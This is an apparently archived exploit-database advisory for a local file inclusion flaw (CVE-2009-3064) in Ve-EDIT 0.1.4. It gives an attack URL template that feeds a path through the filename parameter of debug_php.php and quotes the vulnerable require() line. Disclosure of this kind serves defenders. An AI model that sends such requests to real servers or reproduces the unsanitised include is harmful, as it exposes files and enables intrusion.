Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion
Author: CoBRa_21
type: webapps
platform: php
port:
date_added: 2009-08-31
date_updated:
verified: 1
codes: OSVDB-57680;CVE-2009-3064
tags:
aliases:
screenshot_url:
application_url:
-------------------------------------------------------------------------------------
Ve-EDIT v 0.1.4 (debug_php.php) LFI Vulnerability
-------------------------------------------------------------------------------------
Author: CoBRa_21
Mail: uyku_cu[at]windowslive[dot]com
Script Download: http://sourceforge.net/projects/phpwebeditor/
-------------------------------------------------------------------------------------
EXPLOÄ°T:
http://localhost/[PATH]/debugger/debug_php.php?_GET[filename]= [LFÄ°]
-------------------------------------------------------------------------------------
BUG
Line 53: require("./../".$_GET["filename"]);
-------------------------------------------------------------------------------------
# milw0rm.com [2009-09-01]